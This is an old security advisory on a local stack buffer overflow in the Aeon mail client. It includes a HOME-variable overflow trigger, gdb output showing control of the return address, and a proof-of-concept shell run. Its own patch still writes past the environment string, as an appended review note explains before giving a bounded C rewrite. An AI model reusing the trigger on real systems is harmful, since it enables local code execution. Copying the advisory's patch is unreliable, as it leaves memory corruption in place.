-------------------------------------------------
No System Group - Advisory #12 - 11/09/05
-------------------------------------------------

Program: Aeon
Homepage: http://www.abenetkiewicz.neostrada.pl/
Operating System: Linux and Unix-Compatible
Vulnerable Versions: Aeon v0.2a and prior
Risk: Low
Impact: Local Stack Buffer Overflow Vulnerability

-------------------------------------------------
- DESCRIPTION
-------------------------------------------------

Aeon is a small and simple SMTP client. It can be used as a replacement for sendmail, postfix and other big, multi-purpose mail transfer agents. It works fine with mutt, pine and many other console clients. Aeon has a very simple configuration process which makes sending email as easy as never before.

More information at: http://www.abenetkiewicz.neostrada.pl/

-------------------------------------------------
- DETAILS
-------------------------------------------------

There is a stack buffer overflow in the getConfig() function of lib_aeon.c. The value of the HOME environment variable is copied with strcpy() into a local buffer of MAX_LEN (512) bytes without any length check, and "/.aeonrc" is then appended with strcat(). A HOME value longer than the buffer overwrites the saved frame pointer and return address of getConfig(). Since any local user controls their own environment, this may allow local command execution with the privileges of the process running Aeon.

----------- lib_aeon.c ------------
13: /* reading rc file, handling missing options */
14: int getConfig(char settings[MAX_SETTINGS][MAX_LEN])
15: {
16:     char home[MAX_LEN];
17:     FILE *fp;           /* .rc file handler */
18:     int numSet = 0;     /* number of settings */
19:
20:     strcpy(home, getenv("HOME"));   /* get home path */
21:     strcat(home, "/.aeonrc");       /* full path to rc file */
22:     fp = fopen(home, "r");
23:     if (fp == NULL) return -1;      /* no cfg - ERROR */
24:     while (fgets(settings[numSet], MAX_LEN-1, fp) && (numSet < MAX_SETTINGS
25:     fclose(fp);
26:
27:     return numSet;
28: }
----------- lib_aeon.c ------------

Here we can see that line 20 of lib_aeon.c does not check the number of bytes stored in HOME before copying it (and line 20 also dereferences a NULL pointer if HOME is unset). We will now see what happens...
coki@coki:/home/coki/audit$ export HOME=`perl -e 'print "A" x 528'`
coki@coki:/home/coki/audit$ /usr/bin/sendmail
Segmentation fault (core dumped)
coki@coki:/home/coki/audit$

When more than 512 bytes are stored in HOME, the buffer 'home' is overflowed (here Aeon is installed as the sendmail replacement, /usr/bin/sendmail). We will now see what happened with gdb:

coki@coki:/home/coki/audit$ gdb -c core
GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux".
Core was generated by `/usr/bin/sendmail'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) i r
eax            0xffffffff       -1
ecx            0x806d000        134664192
edx            0x1000           4096
ebx            0x4015cff4       1075171316
esp            0xbfffe2f0       0xbfffe2f0
ebp            0x41414141       0x41414141
esi            0xbffff37c       -1073745028
edi            0x1              1
eip            0x41414141       0x41414141
eflags         0x210246         2163270
cs             0x23             35
ss             0x2b             43
ds             0x2b             43
es             0x2b             43
fs             0x2b             43
gs             0x2b             43
(gdb) q
coki@coki:/home/coki/audit$

We can see that EIP is overwritten with 0x41414141. EBP holds the same value, so the 'A' bytes from HOME ran past the 512-byte 'home' buffer and over both the saved frame pointer and the saved return address: whoever controls HOME controls where getConfig() returns to.

-------------------------------------------------
- EXPLOIT
-------------------------------------------------

I have written a Proof of Concept exploit:

http://www.nosystem.com.ar/exploits/aeon_bof.c

coki@coki:~/audit$ ./aeon_bof /usr/bin/sendmail
Aeon <= 0.2a local stack buffer overflow (Proof of Concept)
by CoKi

sh-3.00$

/usr/bin/sendmail is not SUID by default :( so the shell runs with the invoking user's own privileges; the bug only crosses a privilege boundary on systems where the binary has been installed setuid, which is consistent with the Low risk rating above.

-------------------------------------------------
- SOLUTIONS
-------------------------------------------------

The patch is included here:

--- lib_aeon.c	2004-10-05 18:08:30.000000000 -0300
+++ lib_aeon.c.OLD	2005-09-11 01:34:08.000000000 -0300
@@ -12,11 +12,11 @@
 /* reading rc file, handling missing options */
 int getConfig(char settings[MAX_SETTINGS][MAX_LEN])
 {
-	char home[MAX_LEN];
+	char *home;
 	FILE *fp;		/* .rc file handler */
 	int numSet = 0;		/* number of settings */
 
-	strcpy(home, getenv("HOME"));	/* get home path */
+	home = getenv("HOME");		/* get home path */
 	strcat(home, "/.aeonrc");	/* full path to rc file */
 	fp = fopen(home, "r");
 	if (fp == NULL) return -1;	/* no cfg - ERROR */

-------------------------------------------------
- REFERENCES
-------------------------------------------------

http://www.nosystem.com.ar/advisories/advisory-12.txt

-------------------------------------------------
- CREDITS
-------------------------------------------------

Discovered by CoKi
No System Group - http://www.nosystem.com.ar
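Review bot: the replacement still writes out of bounds. With `+	home = getenv("HOME");` followed by the unchanged ` 	strcat(home, "/.aeonrc");`, the nine bytes of "/.aeonrc" plus NUL are appended in place to the string that lives in the process environment block, overwriting whatever follows HOME there (the next environment variable, or memory past the end of the block), and every call to getConfig() grows it further. Neither the old `strcpy(home, getenv("HOME"))` nor the new line handles getenv() returning NULL when HOME is unset, so both crash there. Suggested shape instead: keep `char home[MAX_LEN];`, fetch `const char *h = getenv("HOME");`, return -1 if `h == NULL` or `strlen(h) + strlen("/.aeonrc") + 1 > sizeof home`, then build the path with `snprintf(home, sizeof home, "%s/.aeonrc", h)`. Also the header names the patched side `lib_aeon.c.OLD`; worth confirming the direction of the diff before applying it.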
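The bounded path construction described in DETAILS and SOLUTIONS, written out as an added example; this is not Aeon's code and not the patch above. MAX_LEN (512), the "/.aeonrc" suffix and the 'A'-filled HOME values come from the advisory; the function names build_rc_path(), try_home_of_length(), try_null_home() and rc_path_matches() are this example's own. It treats an unset HOME as an error instead of dereferencing NULL, and rejects a HOME that would not fit instead of truncating it (a silently shortened path would open a different file than the one the user configured).

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_LEN   512         /* buffer size used by lib_aeon.c's getConfig() */
#define RC_SUFFIX "/.aeonrc"  /* appended to $HOME by the original code */

/*
 * Vulnerable shape from the advisory (deliberately not compiled here):
 *     char home[MAX_LEN];
 *     strcpy(home, getenv("HOME"));   -- unbounded copy of user-controlled data
 *     strcat(home, "/.aeonrc");       -- second unbounded write
 * Any HOME longer than 503 bytes already runs past 'home' via strcat();
 * the 528-byte HOME in the advisory reaches the saved EBP and EIP
 * (both 0x41414141 in the gdb dump).
 */

/*
 * Example replacement (name build_rc_path is this example's, not Aeon's).
 * Builds "<home>/.aeonrc" into out[out_len].
 * Returns 0 on success, -1 if HOME is unset or the result would not fit.
 */
int build_rc_path(const char *home_env, char *out, size_t out_len)
{
    if (home_env == NULL || out == NULL || out_len == 0)
        return -1;                          /* unset HOME: error, not a NULL deref */

    size_t need = strlen(home_env) + strlen(RC_SUFFIX) + 1;   /* +1 for the NUL */
    if (need > out_len)
        return -1;                          /* refuse rather than truncate */

    int n = snprintf(out, out_len, "%s%s", home_env, RC_SUFFIX);
    if (n < 0 || (size_t)n >= out_len)
        return -1;                          /* cannot happen after the check above */
    return 0;
}

/* Constructed input: a HOME of n 'A' bytes, like the export in the advisory. */
int try_home_of_length(size_t n)
{
    char out[MAX_LEN];
    char *home = malloc(n + 1);
    if (home == NULL)
        return -1;
    memset(home, 'A', n);
    home[n] = '\0';
    int rc = build_rc_path(home, out, sizeof out);
    free(home);
    return rc;
}

/* HOME not set at all: getenv() would return NULL. */
int try_null_home(void)
{
    char out[MAX_LEN];
    return build_rc_path(NULL, out, sizeof out);
}

/* 1 if build_rc_path() succeeds and yields exactly 'expected', else 0. */
int rc_path_matches(const char *home_env, const char *expected)
{
    char out[MAX_LEN];
    if (build_rc_path(home_env, out, sizeof out) != 0)
        return 0;
    return strcmp(out, expected) == 0;
}

int main(void)
{
    char out[MAX_LEN];

    /* Ordinary home directory: fits, path is built. */
    if (build_rc_path("/home/coki", out, sizeof out) == 0)
        printf("ok    : %s\n", out);

    /* The advisory's trigger, 528 'A's, is rejected instead of smashing the stack. */
    printf("528 A : %s\n", try_home_of_length(528) == 0 ? "accepted" : "rejected");

    /* Boundary: 503 + strlen("/.aeonrc") + NUL == 512 fits; 504 does not. */
    printf("503 A : %s\n", try_home_of_length(503) == 0 ? "accepted" : "rejected");
    printf("504 A : %s\n", try_home_of_length(504) == 0 ? "accepted" : "rejected");

    /* Unset HOME is an error, not a crash. */
    printf("unset : %s\n", try_null_home() == 0 ? "accepted" : "rejected");
    return 0;
}
```

The explicit length check before snprintf() is what makes the behaviour an error return rather than a truncation; snprintf() alone would stop at out_len but would hand back a path the user never configured.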